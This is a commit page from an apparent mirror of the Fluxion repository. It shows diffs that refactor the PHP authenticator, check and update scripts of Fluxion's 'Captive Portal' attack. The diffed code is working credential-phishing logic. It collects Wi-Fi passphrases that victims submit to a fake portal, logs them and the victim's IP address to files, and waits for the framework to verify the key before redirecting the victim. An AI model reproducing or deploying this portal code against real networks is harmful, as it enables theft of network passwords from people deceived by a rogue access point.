Mirrors
/
fluxion
mirror of https://github.com/FluxionNetwork/fluxion.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Improved identifiers & sequencing.

This commit is contained in:
Matias Barcenas 2019-05-26 21:38:00 -05:00
parent 1ff3aae7e2
commit a2b32f4feb
3 changed files with 63 additions and 54 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

113
attacks/Captive Portal/lib/authenticator.php
View File

@ -1,67 +1,76 @@
<?php <?php
error_reporting(0); error_reporting(0);
/* // Store get & post data to variables.
The following represents the authenticator result. $candidate_key_fields = array(
By default, we assume the password is incorrect. "password",
"password1",
"passphrase",
"key",
"key1",
"wpa",
"wpa_psw");
Notice: This variable is used by files including // Get array of keys matching any in $candidate_key_fields.
this script, and by the authenticator itself below. $candidate_key_fields_matches = array_intersect_key($_POST, array_flip($candidate_key_fields));
*/
$candidate_code = 0;
// Receive get & post data and store to variables // Retrieve just the first matched value.
$candidateKeyFields = array("password", "password1", "passphrase", "key", "key1", "wpa", "wpa_psw"); $candidate_key = reset($candidate_key_fields_matches);
$matches = array_intersect_key($_POST, array_flip($candidateKeyFields));
// Retrieve just the first matched value // The following varible represents the authenticator result.
$key = reset($matches); // By default, we assume the password is incorrect (value 0).
// WARNING: The variable below is used by external scripts.
// That means it MUST be defined before exiting returning.
$candidate_key_result = 0;
// No password was given // Attempt verification only if a key exists.
if(empty($key)) return; if(!empty($candidate_key))
{
// Increment hit attempts.
$page_hits_log_path = ("$FLUXIONWorkspacePath/hit.txt");
$page_hits = file($page_hits_log_path)[0] + 1;
$page_hits_log = fopen($page_hits_log_path, "w");
fputs($page_hits_log, $page_hits);
fclose($page_hits_log);
// Update hit attempts // Prepare candidate, and attempt, passwords files' locations.
$page_hits_log_path = ("$FLUXIONWorkspacePath/hit.txt"); // Notice: The values in the strings below will be substituted
$page_hits = file($page_hits_log_path)[0] + 1; // by the script once the autheticator script is deployed.
$page_hits_log = fopen($page_hits_log_path, "w"); $attempt_log_path = "$FLUXIONWorkspacePath/pwdattempt.txt";
fputs($page_hits_log, $page_hits); $candidate_key_path = "$FLUXIONWorkspacePath/candidate.txt";
fclose($page_hits_log);
// Prepare candidate and attempt passwords files' locations. $attempt_log_file = fopen($attempt_log_path, "w");
$attempt_log_path = "$FLUXIONWorkspacePath/pwdattempt.txt"; fwrite($attempt_log_file, $candidate_key);
$candidate_path = "$FLUXIONWorkspacePath/candidate.txt"; fwrite($attempt_log_file, "\n");
fclose($attempt_log_file);
$attempt_log = fopen($attempt_log_path, "w"); // Write candidate key to file to prep for checking.
fwrite($attempt_log, $key); $candidate_key_file = fopen($candidate_key_path, "w");
fwrite($attempt_log, "\n"); fwrite($candidate_key_file, $candidate_key);
fclose($attempt_log); fwrite($candidate_key_file, "\n");
fclose($candidate_key_file);
// Write candidate key to file to prep for checking. // Prepare clients IP log path, and client IP.
$candidate = fopen($candidate_path, "w"); $clients_IP_log_path = "/tmp/fluxspace/ip_hits";
fwrite($candidate, $key); $client_IP = $_SERVER['REMOTE_ADDR'];
fwrite($candidate, "\n");
fclose($candidate);
$candidate_result_path = "$FLUXIONWorkspacePath/candidate_result.txt"; // Write client IP to log file.
$clients_IP_file = fopen($clients_IP_log_path, "w");
fwrite($clients_IP_file, $client_IP);
fclose($clients_IP_file);
// Define variables $candidate_key_result_path = "$FLUXIONWorkspacePath/candidate_result.txt";
$client_ip_path = "/tmp/fluxspace/ip_hits";
$client_ip = $_SERVER['REMOTE_ADDR'];
// Write ip to file
$c = fopen($client_ip_path, "w");
fwrite($c,$client_ip);
fclose($c);
// Create candidate result file to trigger checking. // Create candidate result file to trigger checking.
$candidate_result = fopen($candidate_result_path, "w"); $candidate_key_result_file = fopen($candidate_key_result_path, "w");
fwrite($candidate_result,"\n"); fwrite($candidate_key_result_file,"\n");
fclose($candidate_result); fclose($candidate_key_result_file);
do { do {
sleep(1); sleep(1);
$candidate_code = trim(file_get_contents($candidate_result_path)); $candidate_key_result = trim(file_get_contents($candidate_key_result_path));
} while (!ctype_digit($candidate_code)); } while (!ctype_digit($candidate_key_result));
// Reset file by deleting it. // Reset file by deleting it.
unlink($candidate_result_path); unlink($candidate_key_result_path);
}

2
attacks/Captive Portal/lib/check.php
View File

@ -1,7 +1,7 @@
<?php <?php
require_once("authenticator.php"); require_once("authenticator.php");
switch ($candidate_code) { switch ($candidate_key_result) {
# case "1": header("Location:error.html"); break; # case "1": header("Location:error.html"); break;
case "2": header("Location:final.html"); break; case "2": header("Location:final.html"); break;
default: header("Location:error.html"); break; default: header("Location:error.html"); break;

2
attacks/Captive Portal/lib/update.php
View File

@ -1,7 +1,7 @@
<?php <?php
require_once("authenticator.php"); require_once("authenticator.php");
switch ($candidate_code) { switch ($candidate_key_result) {
# case "1": echo ""; break; # case "1": echo ""; break;
case "2": echo "authenticated"; break; case "2": echo "authenticated"; break;
# default: echo ""; break; # default: echo ""; break;